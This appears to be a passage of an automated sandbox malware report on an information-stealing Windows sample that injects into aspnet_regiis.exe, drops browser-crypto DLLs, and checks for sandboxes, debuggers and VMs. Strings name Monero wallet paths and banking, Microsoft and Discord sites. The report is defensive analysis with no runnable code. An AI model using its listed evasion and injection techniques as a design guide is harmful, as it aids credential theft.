Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A18950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: aspnet_regiis.exe	Binary or memory string: DIR_WATCH.DLL
Source: aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: aspnet_regiis.exe	Binary or memory string: SBIEDLL.DLL
Source: aspnet_regiis.exe	Binary or memory string: API_LOG.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 5540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 6540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 6670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 7670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 8A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9A20000 memory reserve \| memory write watch	Jump to behavior

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_02A0180D

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Window / User API: threadDelayed 831			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Window / User API: threadDelayed 1900			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

API coverage: 9.1 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 3980

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A10DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A10EEEh

3_2_02A10DDB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D38ED FindFirstFileExW,	0_2_6D5D38ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A15FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_02A0BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_02A14CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_02A1543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A01D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_02A0B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A09D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_02A15B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_02A0CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_02A15142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A10FBA GetSystemInfo,wsprintfA,

3_2_02A10FBA

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: CFBFHI.3.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware-
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: CFBFHI.3.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: CFBFHI.3.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: CFBFHI.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: CFBFHI.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: CFBFHI.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: CFBFHI.3.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: CFBFHI.3.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: CFBFHI.3.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: CFBFHI.3.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: CFBFHI.3.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: CFBFHI.3.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: CFBFHI.3.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: CFBFHI.3.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: CFBFHI.3.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: CFBFHI.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<Q'2
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: CFBFHI.3.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: CFBFHI.3.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP$
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: CFBFHI.3.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: CFBFHI.3.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: CFBFHI.3.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6D5D199C

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A18950

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A014AD mov eax, dword ptr fs:[00000030h]	3_2_02A014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A014A2 mov eax, dword ptr fs:[00000030h]	3_2_02A014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0148A mov eax, dword ptr fs:[00000030h]	3_2_02A0148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A18599 mov eax, dword ptr fs:[00000030h]	3_2_02A18599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1859A mov eax, dword ptr fs:[00000030h]	3_2_02A1859A

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5D5010 GetProcessHeap,

0_2_6D5D5010

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D5D199C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CD4D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D5CD4D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CDA02 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D5CDA02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02A1D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_02A1D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2762E SetUnhandledExceptionFilter,	3_2_02A2762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CA9B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CA9B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CC4AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

0_2_6D5BABD0

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_02A124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_02A1257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A01000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A30000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A3D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C70000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C71000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29B5008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5CDBC8 cpuid

0_2_6D5CDBC8

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_02A10DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_02A2B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_02A2B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_02A29A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_02A253E3
